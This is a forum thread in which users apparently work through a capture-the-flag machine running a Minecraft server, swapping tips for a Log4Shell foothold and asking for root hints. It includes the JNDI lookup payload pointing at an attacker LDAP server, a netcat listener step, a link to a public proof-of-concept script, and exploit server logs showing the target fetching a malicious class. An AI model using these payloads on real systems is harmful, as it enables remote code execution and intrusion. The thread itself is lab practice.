Posts: 6
Threads: 1
Joined: Nov 2023
(Feb 10, 2024, 11:47 PM)iNone Wrote: (Feb 10, 2024, 11:44 PM)L453R Wrote: (Feb 10, 2024, 11:03 PM)0xfd9aac Wrote: Can someone share working payload for malicious class (revshell)? 15 attempts and 0 result.
May be you need the good version of java, i used this one: https://repo.huaweicloud.com/java/jdk/8u...x64.tar.gz.
Classic payload from reverseshells.com base64 encoded
is not neccesary ${jndi:ldap://ip:port/a} ??
Yes it is, in the game, but the created a class must be compiled with appropriate version of java
Posts: 7
Threads: 0
Joined: Feb 2024
(Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but isn't work
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
Posts: 7
Threads: 0
Joined: Dec 2023
(Feb 10, 2024, 11:58 PM)pwnbox Wrote: (Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but isn't work
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
I tried this one, but I can't get it. Did you change the jdk version?
I'm on jdk1.8.0_20/bin/java.
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
Where 10.10.x is my local ip (redacted)
Posts: 7
Threads: 0
Joined: Feb 2024
(Feb 11, 2024, 12:12 AM)fucksurveillance Wrote: (Feb 10, 2024, 11:58 PM)pwnbox Wrote: (Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but isn't work
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
I tried this one, but I can't get it. Did you change the jdk version?
I'm on jdk1.8.0_20/bin/java.
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
Where 10.10.x is my local ip (redacted)
you just have to copy your jdk folder to the repo directory, rename it to jdk1.8.0_20 and use netcat to be listening in a port. Then send the message ${jndi:ldap://10.10.x.x:1389/a} in minecraft chat
Posts: 14
Threads: 1
Joined: Jan 2024
so there are many skids in this thread that can't even Run minecraft. it's pretty funny. won't spoonfeed but will help i guess.
1. use a console UI for minecraft. (use google)
2. use kozmer poc
3. get jdk 8u20 to use with kozmer poc
4. it will fail unless you update the poc.py. if you're too dumb to realize why after looking at the code, it's time to logoff of life.
5. it will work if u follow above steps
root is hard though, exhausted all tricks i know. going to reenum again
Posts: 7
Threads: 0
Joined: Feb 2024
Feb 11, 2024, 12:21 AM
(This post was last modified: Feb 11, 2024, 12:23 AM by pwnbox.)
any hint for root flag?
(Feb 11, 2024, 12:21 AM)tiresomeenergy Wrote: so there are many skids in this thread that can't even Run minecraft. it's pretty funny. won't spoonfeed but will help i guess.
1. use a console UI for minecraft. (use google)
2. use kozmer poc
3. get jdk 8u20 to use with kozmer poc
4. it will fail unless you update the poc.py. if you're too dumb to realize why after looking at the code, it's time to logoff of life.
5. it will work if u follow above steps
root is hard though, exhausted all tricks i know. going to reenum again
im stucket at root too, i really hate windows machines
Posts: 14
Threads: 1
Joined: Jan 2024
(Feb 11, 2024, 12:31 AM)wenston91 Wrote: (Feb 11, 2024, 12:12 AM)fucksurveillance Wrote: (Feb 10, 2024, 11:58 PM)pwnbox Wrote: (Feb 10, 2024, 11:35 PM)iNone Wrote: can anyone share the poc please? i tried with many but isn't work
This one worked https://github.com/kozmer/log4j-shell-po...ain/poc.py
I tried this one, but I can't get it. Did you change the jdk version?
I'm on jdk1.8.0_20/bin/java.
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
10.10.11.249 - - [10/Feb/2024] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for a redirecting to http://10.10.x:8000/Exploit.class
Where 10.10.x is my local ip (redacted)
read the fcking script you are executing, this is a windows machine
sssshhhhhh don't speenfood le skiddos 
Posts: 134
Threads: 13
Joined: Sep 2023
for root look where youre dropped into when you get the foothold
Posts: 134
Threads: 13
Joined: Sep 2023
Posts: 2
Threads: 0
Joined: Feb 2024
If you're having issues getting foothold.. David Bombal did a video on this.. link to John Hammond's video in the description of that video.. EZPZ.
|
